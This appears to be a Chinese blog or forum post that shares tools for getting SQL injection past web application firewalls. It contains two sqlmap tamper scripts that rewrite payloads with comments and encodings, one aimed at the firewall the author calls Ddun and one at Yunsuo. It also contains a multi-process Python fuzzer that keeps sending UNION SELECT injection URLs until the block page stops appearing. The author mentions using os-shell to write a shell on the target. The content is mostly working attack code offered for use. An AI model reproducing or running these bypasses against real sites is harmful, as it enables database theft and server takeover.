发表评论
微信扫一扫加我哦~
微信扫一扫加我哦~
#!/usr/bin/env python from lib.core.enums import PRIORITY __priority__ = PRIORITY.LOW def dependencies(): pass def tamper(payload, **kwargs): """ BYPASS Ddun """ retVal = payload if payload: retVal = "" quote, doublequote, firstspace = False, False, False for i in xrange(len(payload)): if not firstspace: if payload[i].isspace(): firstspace = True retVal += "/*DJSAWW%2B%26Lt%3B%2B*/" continue elif payload[i] == '\'': quote = not quote elif payload[i] == '"': doublequote = not doublequote elif payload[i] == " " and not doublequote and not quote: retVal += "/*DJSAWW%2B%26Lt%3B%2B*/" continue retVal += payload[i] return retVal
#@author:九世
#@time:2019/11/15
#@file:bypass.py
from gevent import monkey;monkey.patch_all()
from multiprocessing import Process
from colorama import init,Fore
import gevent
import requests
import time
import asyncio
import string
init(wrap=True)
class BypassDog(object):
def __init__(self):
self.data=string.digits+'!' #定义内容
self.payload='http://192.168.241.158/sql.php?id=0%20union%20select%201,2'
self.ybs=[]
self.djcs=[]
self.xcs=[]
self.calc=0
self.calc2=0
self.calc3=0
self.huan=' '
self.dr=''
self.r=''
def reqts(self,da):
jg=self.payload.replace('%20','/*{}*/'.format(da))
try:
rqt=requests.get(url=jg,headers={'user-agent':'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36'})
if not '网站防火墙' in rqt.text and not 'NULL' in rqt.text:
print(Fore.GREEN+'[+] '+Fore.WHITE+' Bypass Dog url:{}'.format(jg))
print(jg,file=open('test.txt','a',encoding='utf-8'))
exit()
else:
print(Fore.RED+'[-] '+Fore.WHITE+' Bypass Dog fuck url:{}'.format(jg))
except:
pass
def xc(self,rw):
for g in rw:
self.xcs.append(gevent.spawn(self.reqts,g))
gevent.joinall(self.xcs)
self.xcs.clear()
def djc(self):
for u in self.ybs:
if self.calc==100:
p=Process(target=self.xc,args=(self.djcs,))
p.start()
self.calc=0
self.djcs.clear()
time.sleep(0.01) #0.01 CPU低于50% 0.005CPU低于70 0.003CPU低于95,根据内容数量来手动设置是否需要延时
self.djcs.append(u)
self.calc+=1
if len(self.djcs)>0:
p = Process(target=self.xc, args=(self.djcs,))
p.start()
self.calc = 0
self.djcs.clear()
async def yb(self):
for g in range(1,len(self.data)+1):
while True:
if self.calc3>g:
gd=self.dr+' pod={};self.ybs.append(pod);self.calc2+=1\n{}' \
'if self.calc2==100:\n{}' \
' self.djc()\n{}self.calc2=0\n{}self.ybs.clear()\n' \
'if len(self.ybs)>0:\n' \
' self.djc();self.calc2=0;self.ybs.clear()'.format(self.r.rstrip('+'),self.huan+' ',self.huan+' ',self.huan+' '+' ',self.huan+' '+' ')
exec(gd)
self.calc3=0
self.huan=' '
self.dr=''
break
else:
self.dr+="for s{} in self.data:\n{}".format(self.calc3,self.huan)
self.r+='s{}+'.format(self.calc3)
self.calc3+=1
self.huan+=' '
if __name__ == '__main__':
obj=BypassDog()
loop=asyncio.get_event_loop()
tk=loop.create_task(obj.yb())
loop.run_until_complete(tk)只支持用union查询来过的,其他的测试语句会被云锁报警,这里问下大佬sqlmap能不能指定union来测试。。 这个os-shell也可以写出shell脚本,但是还后续执行命令会被云锁报警
#!/usr/bin/env python
"""
Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
import re
from lib.core.data import kb
from lib.core.enums import PRIORITY
from lib.core.common import singleTimeWarnMessage
from lib.core.enums import DBMS
__priority__ = PRIORITY.LOW
def dependencies():
pass
def tamper(payload, **kwargs):
payload=payload.replace('ORDER','/*!00000order*/')
payload=payload.replace('ALL SELECT','/*!00000all*/ /*!00000select')
payload=payload.replace('CONCAT(',"CONCAT/**/(")
payload=payload.replace("--"," */--")
payload=payload.replace("AND","%26%26")
return payload